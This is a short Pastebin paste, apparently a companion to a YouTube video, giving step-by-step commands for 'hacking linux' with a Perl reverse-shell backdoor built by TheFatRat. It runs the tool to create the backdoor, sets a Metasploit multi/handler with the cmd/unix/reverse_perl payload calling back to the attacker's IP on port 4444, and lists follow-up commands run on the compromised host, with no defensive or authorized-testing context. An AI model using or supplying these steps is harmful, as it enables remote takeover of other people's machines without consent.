Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##################################################JokerSecurity###############################################################
- # Title : hacking linux with perl payload using TheFatRat
- # Tested On : [ Kali-Linux ]
- # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
- # Myblog : http://kader-information.blogspot.com/
- # Link Video :https://www.youtube.com/watch?v=uaviSnfxgPM&feature=youtu.be
- ######################
- # [+] COMMENDS :
- ######################
- create Backdoor :
- ================
- cd TheFatRat
- ./fatrat
- metasploit commends
- ================
- msfconsole
- use exploit/multi/handler
- set payload cmd/unix/reverse_perl
- set lhost (your-ip)
- set lport 4444
- exploit
- ls
- ifconfig
- reboot
- subscribe for my channel and page in facebook
- # My Blogger : http://kader-information.blogspot.com/
- # Page FacebOOk 1: https://www.facebook.com/AnonymousPalestine.vip
- # Page Facebook 2 : https://www.facebook.com/Professional.hacker.25
- By <3
- ##################################################JokerSecurity###############################################################
Add Comment
Please, Sign In to add comment